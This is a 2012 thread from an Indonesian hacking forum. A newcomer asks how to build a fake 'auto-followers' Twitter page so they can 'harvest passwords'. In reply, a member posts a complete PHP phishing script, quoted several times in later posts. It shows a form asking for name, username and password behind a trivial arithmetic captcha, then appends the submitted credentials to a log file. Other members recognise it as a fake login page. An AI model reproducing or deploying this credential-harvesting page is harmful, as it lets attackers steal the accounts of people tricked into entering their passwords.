Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-26-2013, 02:44 PM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Programming › PHP v
« Previous 1 ... 13 14 15 16 17 ... 31 Next »

[Ask] cara membuat script PHP untuk membuat followers

Home General Computer Multimedia Business Lounge

Post Reply 
Tweet
Threaded Mode | Linear Mode
Ask cara membuat script PHP untuk membuat followers
06-15-2012, 09:56 AM (This post was last modified: 06-15-2012 10:14 AM by daud32.)
Post: #1
daud32 Offline
INI devilzc0de.org bukan kakus
Posts: 26
Joined: Feb 2012
Reputation: 0
cara membuat script PHP untuk membuat followers
hello permisi sesepuh dan dedengit penunggu DC ngakak


ane newbie mau banyak nanya nih , sorry ya kalo kebanyakan ngambek

om , setelah ane cari cari di google dan tanpa sengaja menemukan halaman ini http://www.gusbur.info/maker/index.php

btw gimana ya gan cara membuat halaman seperti itu yang bisa di convert (jalanin) ke PHP kayak bot auto followers gitu deh .. tapi itu khan ada captcha.nya mewek apa bisa yaa ??

oiya script dari website tersebut disembunyiin dimana ya gan ?? kok ane CTRL+U gak nemu halamannya sih dari script u/ membuat bot maker followers itu ?? kalo bisa gitu khan enak gan kita bisa panen password :)

tolong dong buat para sesepuh mohon pencerahannya :)
thanks buaanget yang udah memberi komen bermutu smangat
Find all posts by this user
Quote this message in a reply
06-15-2012, 10:16 AM (This post was last modified: 06-15-2012 02:54 PM by test.)
Post: #2
test Online
./Devilz Officer
Posts: 246
Joined: Jan 2012
Reputation: 21
RE: cara membuat script PHP untuk membuat followers
- edited -
jawaban ane ngaco piss
Find all posts by this user
Quote this message in a reply
06-15-2012, 11:40 AM
Post: #3
daud32 Offline
INI devilzc0de.org bukan kakus
Posts: 26
Joined: Feb 2012
Reputation: 0
RE: cara membuat script PHP untuk membuat followers
(06-15-2012 10:16 AM)test Wrote:  kalo script nya kurang lebih seperti ini
PHP Code:
<?php
session_start
();
if(empty(
$_POST)){
    
$jx = rand(20,50);
    
$_SESSION['captchakuis'] = $jx;
    
$kx = rand(1,19);
    
$yx = $jx - $kx;
?>
<form action="" method="post">
Nama : <input type="text" name="nama"><br/>
Username : <input type="text" name="username"><br/>
Password : <input type="password" name="password"><br/>
<b><?php echo $yx." + ".$kx;?></b> <input type="text" name="jawaban"><br/>
<input type="submit" name="submit" value="Buat ID"><br/>
<form>
<?php
}else{
    if(
$_POST['jawaban'] != $_SESSION['captchakuis']){
    unset(
$_SESSION['captchakuis']);
    die(
"Captcha salah");
    }
    
$nama_file = "logs.txt";
    
$file = fopen($nama_file,"a");
    
fwrite($file,"-----------------------\n");
    
fwrite($file,"Nama = ".$_POST['nama']."\n");
    
fwrite($file,"Username = ".$_POST['username']."\n");
    
fwrite($file,"Password = ".$_POST['password']."\n");
    
fwrite($file,"-----------------------\n");
    
fclose($file);
    echo 
"Berhasil Membuat ID";
    unset(
$_SESSION['captchakuis']);
}
?>

mohon maaf kalo salah,, karena baru belajar belajar

aduh ane bingung nginputnya gan :(
btw itu langsung dimasukkin ke mana ya ?? wawa
Find all posts by this user
Quote this message in a reply
06-15-2012, 01:19 PM
Post: #4
dzawa Offline
./Devilz Commander
Posts: 281
Joined: Feb 2012
Reputation: 5
RE: cara membuat script PHP untuk membuat followers
(06-15-2012 10:16 AM)test Wrote:  kalo script nya kurang lebih seperti ini
PHP Code:
<?php
session_start
();
if(empty(
$_POST)){
    
$jx = rand(20,50);
    
$_SESSION['captchakuis'] = $jx;
    
$kx = rand(1,19);
    
$yx = $jx - $kx;
?>
<form action="" method="post">
Nama : <input type="text" name="nama"><br/>
Username : <input type="text" name="username"><br/>
Password : <input type="password" name="password"><br/>
<b><?php echo $yx." + ".$kx;?></b> <input type="text" name="jawaban"><br/>
<input type="submit" name="submit" value="Buat ID"><br/>
<form>
<?php
}else{
    if(
$_POST['jawaban'] != $_SESSION['captchakuis']){
    unset(
$_SESSION['captchakuis']);
    die(
"Captcha salah");
    }
    
$nama_file = "logs.txt";
    
$file = fopen($nama_file,"a");
    
fwrite($file,"-----------------------\n");
    
fwrite($file,"Nama = ".$_POST['nama']."\n");
    
fwrite($file,"Username = ".$_POST['username']."\n");
    
fwrite($file,"Password = ".$_POST['password']."\n");
    
fwrite($file,"-----------------------\n");
    
fclose($file);
    echo 
"Berhasil Membuat ID";
    unset(
$_SESSION['captchakuis']);
}
?>

mohon maaf kalo salah,, karena baru belajar belajar
bukannya itu buat Fakelogin yah ?
Visit this user's website Find all posts by this user
Quote this message in a reply
06-15-2012, 01:38 PM
Post: #5
tabun Offline
./Junk3r C4d3t
Posts: 1,804
Joined: Dec 2011
Reputation: 33
RE: cara membuat script PHP untuk membuat followers
(06-15-2012 01:19 PM)dzawa Wrote:  
(06-15-2012 10:16 AM)test Wrote:  kalo script nya kurang lebih seperti ini
PHP Code:
<?php
session_start
();
if(empty(
$_POST)){
    
$jx = rand(20,50);
    
$_SESSION['captchakuis'] = $jx;
    
$kx = rand(1,19);
    
$yx = $jx - $kx;
?>
<form action="" method="post">
Nama : <input type="text" name="nama"><br/>
Username : <input type="text" name="username"><br/>
Password : <input type="password" name="password"><br/>
<b><?php echo $yx." + ".$kx;?></b> <input type="text" name="jawaban"><br/>
<input type="submit" name="submit" value="Buat ID"><br/>
<form>
<?php
}else{
    if(
$_POST['jawaban'] != $_SESSION['captchakuis']){
    unset(
$_SESSION['captchakuis']);
    die(
"Captcha salah");
    }
    
$nama_file = "logs.txt";
    
$file = fopen($nama_file,"a");
    
fwrite($file,"-----------------------\n");
    
fwrite($file,"Nama = ".$_POST['nama']."\n");
    
fwrite($file,"Username = ".$_POST['username']."\n");
    
fwrite($file,"Password = ".$_POST['password']."\n");
    
fwrite($file,"-----------------------\n");
    
fclose($file);
    echo 
"Berhasil Membuat ID";
    unset(
$_SESSION['captchakuis']);
}
?>

mohon maaf kalo salah,, karena baru belajar belajar
bukannya itu buat Fakelogin yah ?
yupz.. bingung
Find all posts by this user
Quote this message in a reply
06-15-2012, 02:36 PM
Post: #6
test Online
./Devilz Officer
Posts: 246
Joined: Jan 2012
Reputation: 21
RE: cara membuat script PHP untuk membuat followers
(06-15-2012 01:38 PM)tabun Wrote:  
(06-15-2012 01:19 PM)dzawa Wrote:  
(06-15-2012 10:16 AM)test Wrote:  kalo script nya kurang lebih seperti ini
PHP Code:
<?php
session_start
();
if(empty(
$_POST)){
    
$jx = rand(20,50);
    
$_SESSION['captchakuis'] = $jx;
    
$kx = rand(1,19);
    
$yx = $jx - $kx;
?>
<form action="" method="post">
Nama : <input type="text" name="nama"><br/>
Username : <input type="text" name="username"><br/>
Password : <input type="password" name="password"><br/>
<b><?php echo $yx." + ".$kx;?></b> <input type="text" name="jawaban"><br/>
<input type="submit" name="submit" value="Buat ID"><br/>
<form>
<?php
}else{
    if(
$_POST['jawaban'] != $_SESSION['captchakuis']){
    unset(
$_SESSION['captchakuis']);
    die(
"Captcha salah");
    }
    
$nama_file = "logs.txt";
    
$file = fopen($nama_file,"a");
    
fwrite($file,"-----------------------\n");
    
fwrite($file,"Nama = ".$_POST['nama']."\n");
    
fwrite($file,"Username = ".$_POST['username']."\n");
    
fwrite($file,"Password = ".$_POST['password']."\n");
    
fwrite($file,"-----------------------\n");
    
fclose($file);
    echo 
"Berhasil Membuat ID";
    unset(
$_SESSION['captchakuis']);
}
?>

mohon maaf kalo salah,, karena baru belajar belajar
bukannya itu buat Fakelogin yah ?
yupz.. bingung

yg di http://www.gusbur.info/maker/index.php itu kan buat ngumpulin id twitternya,, yg di script itu juga sama buat ngumpulin id twitter nya piss
Find all posts by this user
Quote this message in a reply
06-15-2012, 02:38 PM
Post: #7
dzawa Offline
./Devilz Commander
Posts: 281
Joined: Feb 2012
Reputation: 5
RE: cara membuat script PHP untuk membuat followers
(06-15-2012 02:36 PM)test Wrote:  
(06-15-2012 01:38 PM)tabun Wrote:  
(06-15-2012 01:19 PM)dzawa Wrote:  
(06-15-2012 10:16 AM)test Wrote:  kalo script nya kurang lebih seperti ini
PHP Code:
<?php
session_start
();
if(empty(
$_POST)){
    
$jx = rand(20,50);
    
$_SESSION['captchakuis'] = $jx;
    
$kx = rand(1,19);
    
$yx = $jx - $kx;
?>
<form action="" method="post">
Nama : <input type="text" name="nama"><br/>
Username : <input type="text" name="username"><br/>
Password : <input type="password" name="password"><br/>
<b><?php echo $yx." + ".$kx;?></b> <input type="text" name="jawaban"><br/>
<input type="submit" name="submit" value="Buat ID"><br/>
<form>
<?php
}else{
    if(
$_POST['jawaban'] != $_SESSION['captchakuis']){
    unset(
$_SESSION['captchakuis']);
    die(
"Captcha salah");
    }
    
$nama_file = "logs.txt";
    
$file = fopen($nama_file,"a");
    
fwrite($file,"-----------------------\n");
    
fwrite($file,"Nama = ".$_POST['nama']."\n");
    
fwrite($file,"Username = ".$_POST['username']."\n");
    
fwrite($file,"Password = ".$_POST['password']."\n");
    
fwrite($file,"-----------------------\n");
    
fclose($file);
    echo 
"Berhasil Membuat ID";
    unset(
$_SESSION['captchakuis']);
}
?>

mohon maaf kalo salah,, karena baru belajar belajar
bukannya itu buat Fakelogin yah ?
yupz.. bingung

yg di http://www.gusbur.info/maker/index.php itu kan buat ngumpulin id twitternya,, yg di script itu juga sama buat ngumpulin id twitter nya piss
ngakak iya siih emang tapi kan yg sekalian nge follow gan pinter
Visit this user's website Find all posts by this user
Quote this message in a reply
06-15-2012, 02:54 PM
Post: #8
test Online
./Devilz Officer
Posts: 246
Joined: Jan 2012
Reputation: 21
RE: cara membuat script PHP untuk membuat followers
ane baru nyoba ternyata itu buat daftar twitter hammer piss
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
Sad [Ask] cara buat balesan komentar berita di php superrmario 10 186 05-21-2013 01:53 AM
Last Post: ZenZ
  [Ask] cara membuat data mining pada php? Keonx 2 88 05-19-2013 06:12 PM
Last Post: Keonx
  [Solved] Tentang Cara Search Di Php wildan123456 4 108 05-15-2013 09:26 PM
Last Post: kidofdream
  [Ask] Ada Gk script auto unfollow all following? wildan123456 12 151 05-14-2013 12:58 PM
Last Post: Coziboy
  [Ask] Cara Decrypt Shell (dg Gambar) sayacupu 7 161 05-07-2013 07:52 PM
Last Post: googles
  [Tutor] PHP untuk pemula bagian 1 777r 9 219 05-06-2013 03:47 PM
Last Post: Motaro Irhaby
Question Bagaimana membuat for edit dengan PHP...?? dauf 8 153 05-04-2013 03:59 AM
Last Post: idrus.samury
  [Solved] Cara Bikin Thumbnail Gambar Menggunakan PHP CodeSearcher 4 140 05-02-2013 04:47 PM
Last Post: CodeSearcher
  [Tutor] Membuat MP3 Player Pada Website dengan php Lucious Lawliet 18 272 05-01-2013 05:41 PM
Last Post: kenta
  Mudah Membuat Thumbnail Dengan phpThumb Cruz3N 2 1,264 04-29-2013 07:47 PM
Last Post: CodeSearcher

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-26-2013, 02:44 PM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE